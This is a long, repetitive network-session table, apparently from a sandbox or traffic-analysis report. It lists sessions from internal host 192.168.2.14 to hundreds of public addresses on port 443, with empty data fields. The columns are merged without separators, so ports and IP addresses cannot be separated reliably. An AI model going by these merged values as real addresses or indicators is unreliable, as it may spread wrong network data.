                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15755192.168.2.144028632.8.39.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15756192.168.2.143647646.191.142.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15757192.168.2.144322086.100.159.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15758192.168.2.1440892125.25.154.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15759192.168.2.143888072.110.224.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15760192.168.2.1455280126.197.184.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15761192.168.2.143565696.163.173.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15762192.168.2.143556266.135.54.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15763192.168.2.1454016213.162.95.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15764192.168.2.1433318205.136.255.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15765192.168.2.145770276.234.202.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15766192.168.2.1459340130.162.211.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15767192.168.2.145819268.249.120.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15768192.168.2.1448148101.135.35.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15769192.168.2.1453856216.96.182.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15770192.168.2.1445804179.70.40.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15771192.168.2.1454112166.103.223.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15772192.168.2.145569617.107.228.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15773192.168.2.145157432.161.67.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15774192.168.2.143309817.75.118.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15775192.168.2.144898068.124.59.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15776192.168.2.143954675.41.134.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15777192.168.2.1441292124.216.139.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15778192.168.2.145030275.57.239.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15779192.168.2.1446736149.26.152.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15780192.168.2.1437298134.104.133.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15781192.168.2.1438342122.179.132.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15782192.168.2.145292071.210.13.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15783192.168.2.14373045.165.67.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15784192.168.2.1456466151.163.204.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15785192.168.2.1453164183.201.101.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15786192.168.2.1460022117.246.126.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15787192.168.2.1459308118.54.189.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15788192.168.2.143703277.84.239.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15789192.168.2.1458254116.127.207.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15790192.168.2.144941696.140.152.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15791192.168.2.145723246.240.20.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15792192.168.2.1459300120.89.9.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15793192.168.2.1454974104.42.158.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15794192.168.2.145557438.112.202.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15795192.168.2.1451664204.240.244.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15796192.168.2.1437582128.61.80.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15797192.168.2.1447964117.231.57.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15798192.168.2.1436798114.139.94.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15799192.168.2.1434478193.167.229.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15800192.168.2.1454280193.117.126.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15801192.168.2.144054497.107.87.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15802192.168.2.1437848205.76.85.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15803192.168.2.145802657.150.28.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15804192.168.2.143361440.212.131.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15805192.168.2.1457398182.214.135.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15806192.168.2.145392041.154.209.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15807192.168.2.144134640.250.113.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15808192.168.2.143313252.201.61.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15809192.168.2.1452852177.141.31.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15810192.168.2.1454130100.230.163.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15811192.168.2.144657675.8.30.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15812192.168.2.145751854.71.3.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15813192.168.2.143527052.59.189.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15814192.168.2.145497820.214.73.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15815192.168.2.1460230174.86.190.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15816192.168.2.144702066.68.91.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15817192.168.2.144428639.55.4.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15818192.168.2.1440904133.242.197.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15819192.168.2.144901281.28.247.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15820192.168.2.1447132173.149.114.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15821192.168.2.1454988131.220.33.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15822192.168.2.1455486213.69.110.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15823192.168.2.145133884.166.89.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15824192.168.2.143567440.154.159.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15825192.168.2.1459856102.94.188.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15826192.168.2.144933272.110.0.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15827192.168.2.1437230184.72.65.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15828192.168.2.144520463.216.86.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15829192.168.2.144401017.10.60.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15830192.168.2.1443636217.102.116.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15831192.168.2.1459782188.157.88.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15832192.168.2.144513043.255.123.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15833192.168.2.1440264220.88.169.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15834192.168.2.143845482.98.155.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15835192.168.2.143334291.163.183.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15836192.168.2.144120081.89.96.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15837192.168.2.1434816137.125.236.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15838192.168.2.1448312217.209.241.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15839192.168.2.1443262192.150.5.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15840192.168.2.145090666.60.233.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15841192.168.2.1437186148.108.196.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15842192.168.2.1444402131.39.87.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15843192.168.2.1445122195.184.137.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15844192.168.2.1460544107.245.50.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15845192.168.2.1436624191.3.33.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15846192.168.2.144257272.246.112.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15847192.168.2.1451848100.166.250.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15848192.168.2.144989275.118.252.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15849192.168.2.145052863.136.54.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15850192.168.2.1453646182.117.203.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15851192.168.2.145366834.8.108.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15852192.168.2.144453075.126.159.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15853192.168.2.1446116178.155.243.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15854192.168.2.1434462187.78.148.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15855192.168.2.1432898167.184.224.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15856192.168.2.1434104204.133.243.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15857192.168.2.1445842194.143.40.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15858192.168.2.143578276.3.27.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15859192.168.2.1448888186.149.138.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15860192.168.2.1456320174.182.247.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15861192.168.2.1435348213.66.182.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15862192.168.2.143952093.46.161.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15863192.168.2.1441730162.15.89.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15864192.168.2.1459758140.119.152.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15865192.168.2.144936087.106.72.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15866192.168.2.1439116218.79.251.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15867192.168.2.1455430131.79.125.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15868192.168.2.145841245.118.212.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15869192.168.2.1434396176.107.196.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15870192.168.2.1452320146.196.207.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15871192.168.2.1459910180.226.105.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15872192.168.2.1460028202.157.206.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15873192.168.2.144054063.193.159.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15874192.168.2.144289284.249.28.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15875192.168.2.1460372166.162.10.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15876192.168.2.1445898102.207.159.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15877192.168.2.1453494142.254.234.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15878192.168.2.144224262.137.103.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15879192.168.2.143327090.48.246.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15880192.168.2.145334899.33.200.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15881192.168.2.1442114149.184.195.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15882192.168.2.144649471.114.96.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15883192.168.2.143530299.144.188.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15884192.168.2.1453320140.146.20.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15885192.168.2.1450336195.147.65.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15886192.168.2.143464075.10.121.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15887192.168.2.143589413.96.87.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15888192.168.2.145526439.232.183.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15889192.168.2.1449074167.41.120.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15890192.168.2.1442372172.201.246.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15891192.168.2.143805239.79.236.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15892192.168.2.1443708138.160.130.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15893192.168.2.1445656103.36.114.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15894192.168.2.1455772218.197.106.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15895192.168.2.143639061.196.185.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15896192.168.2.1435642221.210.21.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15897192.168.2.1452096136.237.146.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15898192.168.2.144484234.163.233.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15899192.168.2.1447956150.2.1.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15900192.168.2.144739059.250.22.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15901192.168.2.1443748161.104.178.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15902192.168.2.143926099.225.246.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15903192.168.2.1433736211.176.173.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15904192.168.2.14536241.97.105.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15905192.168.2.1438736144.233.173.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15906192.168.2.1435098187.75.186.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15907192.168.2.145845846.117.67.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15908192.168.2.1459248123.199.66.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15909192.168.2.1442680180.127.125.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15910192.168.2.143797289.203.209.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15911192.168.2.1445016144.170.17.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15912192.168.2.143989857.254.91.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15913192.168.2.145342888.226.186.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15914192.168.2.145078044.103.43.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15915192.168.2.145277087.87.200.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15916192.168.2.1456022179.74.59.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15917192.168.2.14567708.237.56.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15918192.168.2.1449372195.58.24.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15919192.168.2.1451118160.114.179.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15920192.168.2.1433442138.189.141.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15921192.168.2.145868692.86.33.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15922192.168.2.144371283.99.203.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15923192.168.2.144116085.111.76.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15924192.168.2.14575825.83.117.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15925192.168.2.1434040200.234.32.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15926192.168.2.143340220.242.184.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15927192.168.2.1441038138.193.110.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15928192.168.2.144769444.203.98.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15929192.168.2.1448410145.128.35.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15930192.168.2.143344251.76.247.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15931192.168.2.143924614.114.128.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15932192.168.2.145130682.157.115.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15933192.168.2.1443400193.155.187.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15934192.168.2.1458338134.227.77.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15935192.168.2.144355241.55.145.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15936192.168.2.1456624169.74.251.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15937192.168.2.1444716175.205.85.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15938192.168.2.144581232.227.91.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15939192.168.2.1453872130.248.126.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15940192.168.2.143680048.43.117.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15941192.168.2.1454754167.84.179.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15942192.168.2.1453166216.74.114.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15943192.168.2.1459740157.215.206.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15944192.168.2.1447090203.74.134.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15945192.168.2.1458688200.185.32.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15946192.168.2.146008491.53.26.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15947192.168.2.1447268210.21.173.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15948192.168.2.144332642.68.189.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15949192.168.2.1454094167.155.179.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15950192.168.2.144374434.148.200.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15951192.168.2.1433928184.191.115.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15952192.168.2.145176840.80.34.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15953192.168.2.1458792123.98.180.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15954192.168.2.145443446.78.240.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15955192.168.2.1454032159.212.201.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15956192.168.2.1442184217.248.58.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15957192.168.2.144434819.89.23.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15958192.168.2.14450981.3.189.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15959192.168.2.1451264180.239.140.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15960192.168.2.145362654.84.35.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15961192.168.2.144111625.109.69.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15962192.168.2.145271854.26.132.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15963192.168.2.1435990120.233.77.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15964192.168.2.143324862.203.170.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15965192.168.2.143500451.107.166.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15966192.168.2.145039465.254.139.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15967192.168.2.144773425.62.204.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15968192.168.2.1456280126.103.111.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15969192.168.2.1445046174.14.154.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15970192.168.2.143644459.23.180.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15971192.168.2.1435068208.254.139.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15972192.168.2.1451418212.96.115.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15973192.168.2.1459070191.145.41.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15974192.168.2.145395653.72.103.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15975192.168.2.145522078.125.249.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15976192.168.2.1440908203.179.66.187443
                                              TimestampBytes transferredDirectionData


